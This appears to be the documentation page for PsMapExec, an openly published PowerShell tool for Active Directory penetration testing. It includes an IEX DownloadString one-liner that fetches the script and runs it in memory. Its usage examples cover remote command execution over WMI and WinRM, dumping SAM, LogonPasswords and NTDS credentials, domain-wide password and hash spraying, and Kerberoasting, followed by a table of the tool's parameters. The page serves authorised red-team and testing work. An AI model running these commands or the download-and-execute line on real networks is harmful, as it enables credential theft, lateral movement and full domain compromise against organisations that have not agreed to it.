🔵PsMapExec

Get it on GitHub: https://github.com/The-Viper-One/PsMapExec

# Load directly into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Usage Examples

# Execute WMI commands over all systems in the domain using password authentication
 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command ""net user""

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command ""net user""

# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
 
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\temp\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain
PsMapExec -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets ""Domain Admins"" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# IPMI
PsMapExec -Targets 192.168.1.0/24 IPMI

Usage Parameters

General Parameters

Parameter	Value	Description
-Command	whoami	Runs the specified command on the remote system
-CurrentUser	N/A	Instructs PsMapExec to run in current user context. This is default when no other credentials are specified
-Domain	[Domain]	Specifies what domain to run against. Otherwise the current user domain is used
-DomainController	[DC]	Specifies what Domain controller to authenticate against
-Force	N/A	Used to force PsMapExec to run when domain or enterprise admin credentials are used
-Flush	N/A	Flushes stored LDAP variables. Mostly only needed if working in a long term shell in a large enivronment where new computers and users may be added to the domain over time.
-Module	[Module]	Specifies the module to be used for command execution
-NoBanner	N/A	Surpresses the script banner
-NoParse	N/A	Surpresses parsing of some module outputs
-Rainbow	N/A	Queries an online rainbow table from dumped hashes with the modules "Sam, LogonPasswords and NTDS".
-SuccessOnly	N/A	Shows only successful results
-Timeout	[int]	Sets the port scan timeout (ms) against the specified method.
-Threads	[int]	Sets the concurrent executions jobs to run (Default:30)

Authentication Parameters

Parameter	Value	Description
-Hash	[RC4] or [AES256]	Hash value. Must be supplied with -Username
-LocalAuth	N/A	Used to specify when local account authentication should be used
-Password	[Password]	Password value. Must be suplied with -Username
-Ticket	[Ticket] or [Path to ticket]	B64 encoded Kerberos ticket to use for authentication. -Username is not required

Command execution Parameters

Parameter	Value	Description
-Command	[Command]	Runs the specified command on the remote system
-Module	[Module]	Specifies the module to be used for command execution
-ShowOutput	N/A	Displays output for executed modules. Commands will still be shown

Spraying Parameters

Parameter	Value	Description
-AccountAsPassword	N/A	Sprays SAM Account name values as passwords
-EmptyPassword	N/A	Sprays "blank" passwords
-SprayHash	[RC4] or [AES256]	Hash value to be used for hash spraying
-SprayPassword	[Password]	Password value to be used for hash spraying

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).

Generally, you can mix and match various parameters across different methods and modules.